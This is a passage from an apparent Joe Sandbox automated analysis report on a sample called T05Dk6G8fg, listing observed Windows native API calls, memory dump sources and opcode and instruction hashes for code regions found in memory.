                                      • API ID: MemoryProtectVirtual
                                      • String ID:
                                      • API String ID: 2706961497-0
                                      • Opcode ID: 9c94efa769240d00facde54e415d8cda8633e94b467c63515876957ef7643227
                                      • Instruction ID: 2676ae055d78c85f0b48ad4447fd945396103bffeeec1cafafce11e4d9cb1a6a
                                      • Opcode Fuzzy Hash: 9c94efa769240d00facde54e415d8cda8633e94b467c63515876957ef7643227
                                      • Instruction Fuzzy Hash: 9C21E4B1D013599FDB10DFAAD984ADEFBF5FF48310F20842AE519A7650D7759900CBA0
                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 02EB47DB
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43974196529.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2eb0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: fc59ecb06bc3c84eaba391410110048d79b8a485a8fdc5c5fb4d3d8d970e8d55
                                      • Instruction ID: 844cdce097d0945035ad7f87cf0797da7930b08576c0bd4b66cdcf6020aa187a
                                      • Opcode Fuzzy Hash: fc59ecb06bc3c84eaba391410110048d79b8a485a8fdc5c5fb4d3d8d970e8d55
                                      • Instruction Fuzzy Hash: 632123B59002599FDB01CFA9C984BEEFBF5BF48210F10851AE558A7650C7759950CBA0
                                      APIs
                                      • NtDeviceIoControlFile.NTDLL(?,?,?,?,00000000,?,?,?,?,?), ref: 02EB4F5E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43974196529.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2eb0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID: ControlDeviceFile
                                      • String ID:
                                      • API String ID: 3512290074-0
                                      • Opcode ID: 2bed748cddc0888acdb04f5a3ea3f6947b3bdcff8488b9e0b1cc357f640e7699
                                      • Instruction ID: fa49db7f42e3a2abdfcdbd4235eba68200e373c8600c7baae4c1956d1c57d3c6
                                      • Opcode Fuzzy Hash: 2bed748cddc0888acdb04f5a3ea3f6947b3bdcff8488b9e0b1cc357f640e7699
                                      • Instruction Fuzzy Hash: B92112729002099FDF11CFAAC944AEFBBF6FF48314F108419E918A3250C779A950CFA0
                                      APIs
                                      • NtDeviceIoControlFile.NTDLL(?,?,?,?,00000000,?,?,?,?,?), ref: 02EB4F5E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43974196529.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2eb0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID: ControlDeviceFile
                                      • String ID:
                                      • API String ID: 3512290074-0
                                      • Opcode ID: 3fcff0eff1831cd514d0532b4291962c8cdd54cea3ee058eae25ad72ebf8c370
                                      • Instruction ID: 2a4d406a9cb9152879e680be45ebfb5b06a7cd86f66142f2f4949aad55abbc1c
                                      • Opcode Fuzzy Hash: 3fcff0eff1831cd514d0532b4291962c8cdd54cea3ee058eae25ad72ebf8c370
                                      • Instruction Fuzzy Hash: 552132728002499FDF11CFAAC944BEEBBF6FF48214F14852AE958A7250C7399951CFA0
                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 02EB47DB
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43974196529.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2eb0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: 6fad18a2a5de87dc438fdefc9f2fbe29f1490d81f5d159fa54c44ef0fbde1e84
                                      • Instruction ID: f7e5c9ee39a59a02502d62bbd605afb248628bae8cdf1d44a4f2b5c2e0fa2ecb
                                      • Opcode Fuzzy Hash: 6fad18a2a5de87dc438fdefc9f2fbe29f1490d81f5d159fa54c44ef0fbde1e84
                                      • Instruction Fuzzy Hash: 92211FB19003199FDB10DFAAC884AEEFBF5FF48310F10842AE918A3650C775A950CBA0
                                      APIs
                                      • NtQueryVolumeInformationFile.NTDLL(?,?,?,?,?), ref: 02EB4E87
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43974196529.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2eb0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID: FileInformationQueryVolume
                                      • String ID:
                                      • API String ID: 634242254-0
                                      • Opcode ID: 95717a17bbde7f26a1beabe60455a577fb8bd85b394404812541efc882c3b8cd
                                      • Instruction ID: 42ee7226177de5f2dc72546386187bc839417be8ded43f23538ff7130948124b
                                      • Opcode Fuzzy Hash: 95717a17bbde7f26a1beabe60455a577fb8bd85b394404812541efc882c3b8cd
                                      • Instruction Fuzzy Hash: BD2110B5D003488FDB11CFAAC984BEFFBF5AF48220F14892AD459A7650C7799941CFA0
                                      APIs
                                      • NtQueryVolumeInformationFile.NTDLL(?,?,?,?,?), ref: 02EB4E87
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43974196529.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2eb0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID: FileInformationQueryVolume
                                      • String ID:
                                      • API String ID: 634242254-0
                                      • Opcode ID: 0e2869460c84e4f727b1e9046f854df2e52cadf239091f19e037112b701bae90
                                      • Instruction ID: dcdc4b91de8611c3cc66df831d4ab84c296aec55c0ab87f6751dabf3fe2f14d7
                                      • Opcode Fuzzy Hash: 0e2869460c84e4f727b1e9046f854df2e52cadf239091f19e037112b701bae90
                                      • Instruction Fuzzy Hash: 68211071D003089BDB10DFAAC984BEFFBF9AF48310F10882AD419A7250C779A900CFA0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43974196529.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2eb0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: 354de0f695de40ce039a1a4ec6be38a257df9cb32c7ba1605a9d3506ee7a603d
                                      • Instruction ID: d36e3561795f408ffb6b515318ea71647b07afab5bbbed96acfb10b3831287c5
                                      • Opcode Fuzzy Hash: 354de0f695de40ce039a1a4ec6be38a257df9cb32c7ba1605a9d3506ee7a603d
                                      • Instruction Fuzzy Hash: 011166B1D003488FDB10DFAAD5447EEFFF5AF88224F24881AC159A7640CB79A941CBA4
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43974196529.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2eb0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: 76202029f757fdc1e6c04cb3865dcaa6593d043d40c92ef30f07e534cf1d29df
                                      • Instruction ID: 0dbb8c18cf78f92005af4fd88ab9b40bafc85e07c5c84b64a2cce722e6157396
                                      • Opcode Fuzzy Hash: 76202029f757fdc1e6c04cb3865dcaa6593d043d40c92ef30f07e534cf1d29df
                                      • Instruction Fuzzy Hash: F8113671D003488BDB10DFAAD5487EFFBF5EF88324F208819C559A7640DB79A944CBA4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43973641446.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_1520000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: T!
                                      • API String ID: 0-1989090450
                                      • Opcode ID: c0e77922caf0da53b0c24a5f6a23147cd04152d026338f37e5affcb7c4f103f5
                                      • Instruction ID: 915bdf234a04501c7b975d13e8251ab7760dcafbe63b1e63369e853524e65704
                                      • Opcode Fuzzy Hash: c0e77922caf0da53b0c24a5f6a23147cd04152d026338f37e5affcb7c4f103f5
                                      • Instruction Fuzzy Hash: 7EB1F3B5E012188FCB58CFA9C6855DDBBF2BB99300B2481AAD405FB354D7369E05CF64
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43987868646.0000000008180000.00000040.00000800.00020000.00000000.sdmp, Offset: 08180000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8180000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: N'Or
                                      • API String ID: 0-2926044077
                                      • Opcode ID: 20063b0ecf4330b79164dc6f06f24798363b51315e908563a8c09beb55725fc0
                                      • Instruction ID: 2c5d4d468bedc90474f29bf94107446ee4a259754404727bbdfa0d942b8873ee
                                      • Opcode Fuzzy Hash: 20063b0ecf4330b79164dc6f06f24798363b51315e908563a8c09beb55725fc0
                                      • Instruction Fuzzy Hash: 4271D476E013388FDB24DF6D884579ABBF2AF94210F0985AAD819F7355EA309D458FC0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43985105910.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6cd0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 57!O
                                      • API String ID: 0-2909367672
                                      • Opcode ID: 8cb98574d399125b9fde8e0ae1dfabe06764891243638f1eaee46e2953813339
                                      • Instruction ID: 0fae523701477bfa1fd4b755b8468167352eee69e656d59c7b2151ebf0c2e799
                                      • Opcode Fuzzy Hash: 8cb98574d399125b9fde8e0ae1dfabe06764891243638f1eaee46e2953813339
                                      • Instruction Fuzzy Hash: 0C51C176F102299FCB44DF68C8915AEF7B6BB88350715816AE909EB341DB31EC02CBC0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43985105910.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6cd0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 57!O
                                      • API String ID: 0-2909367672
                                      • Opcode ID: 533575bad272d11aaad32cd05491073ed52e8995468bd046e690678b7b41a475
                                      • Instruction ID: cf9edddb902ce47578a26e02fd78d135e3c92e0fd81168933890347f9f1f93f1
                                      • Opcode Fuzzy Hash: 533575bad272d11aaad32cd05491073ed52e8995468bd046e690678b7b41a475
                                      • Instruction Fuzzy Hash: AB519476F102299FCB54DFA8C99156EF7B6BB88350715816AD909EB341DB31EC02CBD0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43987868646.0000000008180000.00000040.00000800.00020000.00000000.sdmp, Offset: 08180000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8180000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8dde116a63e31838bf6823c4ff24a3c399022b2c636d5dc7d7277166d757186b
                                      • Instruction ID: d7bb658bc957647ff104249f4b8270a08b048d1e4ae80cc01969f4957de34c07
                                      • Opcode Fuzzy Hash: 8dde116a63e31838bf6823c4ff24a3c399022b2c636d5dc7d7277166d757186b
                                      • Instruction Fuzzy Hash: EC62C076F112288FCB14EFA9C984999B7F3AF882107568569EC09EB355DB70DD42CBC0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43974196529.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2eb0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 26af0246ddaae19d6371efdeb2a747b8e75b1c6dac98cc67580f004844aeec74
                                      • Instruction ID: 4417c977a0c8ec2a9d81dec58243c04ae5f2d338e326574992319a8715b6b423
                                      • Opcode Fuzzy Hash: 26af0246ddaae19d6371efdeb2a747b8e75b1c6dac98cc67580f004844aeec74
                                      • Instruction Fuzzy Hash: 31427B75A00A05CFCB15CF58C494AAEBBF6FF88314B15DA68D446AB655DB30F881CF90
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43985105910.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6cd0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: da9f66212292acafc1a31aea40949718c3517e76f682cd8757dd25ce56b4b4e1
                                      • Instruction ID: 3171c6ec93de61dc87fad9d2d07aa97d2dc320fb85ed4ac09ddca1d1783b5b8c
                                      • Opcode Fuzzy Hash: da9f66212292acafc1a31aea40949718c3517e76f682cd8757dd25ce56b4b4e1
                                      • Instruction Fuzzy Hash: A5325075F002298FC754DFA9C980A99F7F2BB88310B15C5A9D909EB355DB31ED46CB80
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43985105910.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6cd0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f291d71b41b7675bbfcaa8c87735ed752ae5eef945a12322938abce1ff973900
                                      • Instruction ID: 69ea1b8e8c4db461af2df9275f6d625f34d96beea47a263f9305e70ded07575c
                                      • Opcode Fuzzy Hash: f291d71b41b7675bbfcaa8c87735ed752ae5eef945a12322938abce1ff973900
                                      • Instruction Fuzzy Hash: 10228E35B002158FCB48DFA8C9D09A9F7B3BF88300B59C569E50AEB355DB71AD46CB80
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43987922369.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8190000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8c5ef682923cb5c78da6b2c4f8a88e1e444a8bda6283d0a3ad9e1c832eae97f1
                                      • Instruction ID: cc3aac1429106b979f8b4d07e97b8665aec2e7ba9681bac13ecb1a37a8c2f90c
                                      • Opcode Fuzzy Hash: 8c5ef682923cb5c78da6b2c4f8a88e1e444a8bda6283d0a3ad9e1c832eae97f1
                                      • Instruction Fuzzy Hash: 50028036F011258FCB44DF68D99099AF7A2BF98310719866AE849EB355DB31ED06CBC0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43973641446.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_1520000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cf2da05a17f9e57e4897c7f2d85a5ec9d473b385b08cb5064ac255fab89ed6d2
                                      • Instruction ID: 50354faf00a4c40ce734a036192f0575c10575cfb2daf626db3a9973ac05e071
                                      • Opcode Fuzzy Hash: cf2da05a17f9e57e4897c7f2d85a5ec9d473b385b08cb5064ac255fab89ed6d2
                                      • Instruction Fuzzy Hash: E9D15A37B001314B9B2A667C586427EAAD7BFCA6603694579E84AEF3D5DF34DC0283C1
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43987868646.0000000008180000.00000040.00000800.00020000.00000000.sdmp, Offset: 08180000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8180000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 96bf5ef0bb39eac0546da52ea7ffcd9cde5c9158e579659cd229e2621c0e3d2a
                                      • Instruction ID: 171a748c45e6679b1d856b78e1a850f414e57c6155851c30fa533446a1c5821e
                                      • Opcode Fuzzy Hash: 96bf5ef0bb39eac0546da52ea7ffcd9cde5c9158e579659cd229e2621c0e3d2a
                                      • Instruction Fuzzy Hash: F2026C71F01129CFC754DF69C980999F7B2AF88310B1A8269E809EB355D731ED42CBD0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43987868646.0000000008180000.00000040.00000800.00020000.00000000.sdmp, Offset: 08180000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8180000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1b3b214a7811bc61e4a9eda34ed01e3a1654c91d7ca0e02dee9baec4c2259fe7
                                      • Instruction ID: 944a923a9fb12720b61abb2da86d27a5d20c42ab4a4338cd15ff979a91764c50
                                      • Opcode Fuzzy Hash: 1b3b214a7811bc61e4a9eda34ed01e3a1654c91d7ca0e02dee9baec4c2259fe7
                                      • Instruction Fuzzy Hash: D3F15E75F011159FCB54DF68D99099AF7B2BF88310B25866AE809EB381D732ED42CBD0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43985105910.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6cd0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 224bfcc771f4f64d8e5de05c75e03cf72b00ed9a8fa1887ecab82c8b752b68d3
                                      • Instruction ID: f0bd1a0c442fdf85da3a53f88e2cbfc054e6d963a0705b1e401156c9f252d5d5
                                      • Opcode Fuzzy Hash: 224bfcc771f4f64d8e5de05c75e03cf72b00ed9a8fa1887ecab82c8b752b68d3
                                      • Instruction Fuzzy Hash: BBD14A36E053A15FDB42EB7DD8A02DD7FF1AF8A21470941AAE845DF352DA308C09CB91
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43973641446.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_1520000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7e42c844ff25826a99952695cf386b17ccf7ba5576d6cbae4774fa781a3f9226
                                      • Instruction ID: b8da9b451a813384dc525ae769857e1f8927da44f19ca685cb82a98a9b4389de
                                      • Opcode Fuzzy Hash: 7e42c844ff25826a99952695cf386b17ccf7ba5576d6cbae4774fa781a3f9226
                                      • Instruction Fuzzy Hash: 01F19C76B003258FDB24DF69D8C869DB6F2BB99200F5481B9E509EB391EA749D85CF00
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43974196529.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2eb0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ea5339decc36efd0ea6aa9dd0d94e97c5308caf2d2e4802b5f21e0cdd147c6bb
                                      • Instruction ID: f6d107d09cdeac35f175a3cb18dfff35918127f8096d5247d0e350e38aec5fa4
                                      • Opcode Fuzzy Hash: ea5339decc36efd0ea6aa9dd0d94e97c5308caf2d2e4802b5f21e0cdd147c6bb
                                      • Instruction Fuzzy Hash: 57E1A576E406298FCB15CF99C8856DEB7F2AF88310B1A85AAD805EB351D774EC41CBC0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43985105910.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6cd0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c18c38c87a75762c5b84ac1f8555cda403b3bf23182ffd22f2bfc13ecb3b51a3
                                      • Instruction ID: 80d0455574f8314649e3d690a5c7536d0e68b671c6d2ce987bb6277c27d38594
                                      • Opcode Fuzzy Hash: c18c38c87a75762c5b84ac1f8555cda403b3bf23182ffd22f2bfc13ecb3b51a3
                                      • Instruction Fuzzy Hash: C9D1B035F002249FC754DF69C98499AF7E2AF8831471AC569E919EB355DB31ED02CBC0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43985105910.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6cd0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0f1a802dfb4ac1bb899f70ac330932c01fb88ddfed48936b6b7bec96f73fe429
                                      • Instruction ID: d7125043d2e5d5a370c6fe597bfe5ab28020468b9a7697bbfa390c1cc0029fc5
                                      • Opcode Fuzzy Hash: 0f1a802dfb4ac1bb899f70ac330932c01fb88ddfed48936b6b7bec96f73fe429
                                      • Instruction Fuzzy Hash: 38B10476F002258FCB85EBACD9945AEF7E2AF883107158569E90AEB344DA31DD05CBD0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43985105910.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6cd0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2d04191f5a75c4929a053da6402d8f66e57437c8f4c39cc5044e26e821c12da2
                                      • Instruction ID: 8e6a037e48fc12849c649a022774c54713b48fe00dd264ca0df08e877f6fba4e
                                      • Opcode Fuzzy Hash: 2d04191f5a75c4929a053da6402d8f66e57437c8f4c39cc5044e26e821c12da2
                                      • Instruction Fuzzy Hash: CCB1E672F111244BCB59DB699C5416EB7E7ABC960070A85BEEC0AE7381DB34CC16CBC0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43974196529.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2eb0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8bbf433626c6e3f6725b87f1a0d8671d225605fd8d693fd2b851428217adea16
                                      • Instruction ID: 067a2999774ed5f299321160f0e6b153560620d81c0885c7c235a8b8ffa12dbc
                                      • Opcode Fuzzy Hash: 8bbf433626c6e3f6725b87f1a0d8671d225605fd8d693fd2b851428217adea16
                                      • Instruction Fuzzy Hash: 34B17B35B002198FDB54DFA9C894B9AB7B2BF89214F1581A9E509EF361EB30AC41CF40
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43985105910.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6cd0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0a9a5d4e0f2c7a847c063bd2e18db102eb568f1dd88bb64128c1865954dc0123
                                      • Instruction ID: 651c048b02658af39adf93e8a72b7c627a6b4c7065ee3df43b46d3eeec7f8644
                                      • Opcode Fuzzy Hash: 0a9a5d4e0f2c7a847c063bd2e18db102eb568f1dd88bb64128c1865954dc0123
                                      • Instruction Fuzzy Hash: 94A1E776F002269FDB45EF7DD89169DBBE2AF88214B058569E819EF344EB309D05CBC0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43985105910.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6cd0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 38a96c7d6813e160c9161d60317ed7988effd51db245ea5f26a933fd62b106a8
                                      • Instruction ID: 8e465ea8339cd0537d7c3e8a09d240bd8c48b931eba7113faf7b500f6254e10e
                                      • Opcode Fuzzy Hash: 38a96c7d6813e160c9161d60317ed7988effd51db245ea5f26a933fd62b106a8
                                      • Instruction Fuzzy Hash: 9DA1E676F002269FDB45EB7DD89569DBBE2AB88214B05852DE819EF344EB309D05CBC0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43973641446.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_1520000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 05e7f991768f1856de35cf388db941c75f970fc70ad2f7ec8810511ad18d7214
                                      • Instruction ID: 146ab4295e156d72cf824409315b8abbdb40419e4c3ec2c775cb63f48703be88
                                      • Opcode Fuzzy Hash: 05e7f991768f1856de35cf388db941c75f970fc70ad2f7ec8810511ad18d7214
                                      • Instruction Fuzzy Hash: CAA1D273E102398FDB15CFA8C88459EBBB2BB45220B1A856AD805FB791D734DC45CBD0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43987868646.0000000008180000.00000040.00000800.00020000.00000000.sdmp, Offset: 08180000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8180000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a8e1d545f63f8ace0b617eb8c622efd44d9cc14970a9ec43d24cce2a5a4fc432
                                      • Instruction ID: 42dbab9290eb743e89c3c80a14df450e0a8ec02f6b484eb9713093e7c87038ef
                                      • Opcode Fuzzy Hash: a8e1d545f63f8ace0b617eb8c622efd44d9cc14970a9ec43d24cce2a5a4fc432
                                      • Instruction Fuzzy Hash: CE81CD71B01305CFCB45EFA9C8D55ADFBA3BF99300B15826AE50AAB702DB759C46CB40
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43985105910.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6cd0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 471051c85dfb01bc3f409c1648bf3ed0752c43c4fdb51453fbd7df2c43233286
                                      • Instruction ID: 5898727b2033db5aa98fcf457a6e83453c409f8bec5a9bd039c9352981c26ece
                                      • Opcode Fuzzy Hash: 471051c85dfb01bc3f409c1648bf3ed0752c43c4fdb51453fbd7df2c43233286
                                      • Instruction Fuzzy Hash: E1A19F36F002249FC754DF6DC994999FBE2AF8821471A85A9D919EF352DB31EC02CB84
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43987868646.0000000008180000.00000040.00000800.00020000.00000000.sdmp, Offset: 08180000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8180000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 880e3187b684f6c6e55e42776b4893c2408de9d5c01efeb0d22e44d3da800d1d
                                      • Instruction ID: 978f1b70257f4b219350d5cfc710144410a50d14f9f25ff0802318e0cdc872af
                                      • Opcode Fuzzy Hash: 880e3187b684f6c6e55e42776b4893c2408de9d5c01efeb0d22e44d3da800d1d
                                      • Instruction Fuzzy Hash: D981EF75B01205CFCB05EFA8D8C56ADBBA3AF89300B14856DE40ADB702DB74EC4ACB50
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43985105910.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6cd0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8cde444b5a364a9e4df73e85fa51564edc88c7163cf7bc8d44874f17f7dee583
                                      • Instruction ID: 9c0644feb5d01dcb18008ff82ea60aff3e52d521670828b4cf13fc713f46a211
                                      • Opcode Fuzzy Hash: 8cde444b5a364a9e4df73e85fa51564edc88c7163cf7bc8d44874f17f7dee583
                                      • Instruction Fuzzy Hash: 3D91A035F002249FD744DF6DC994999FBE2AF8831471AC569D919EB352DB31EC02CB84
                                      Memory Dump Source
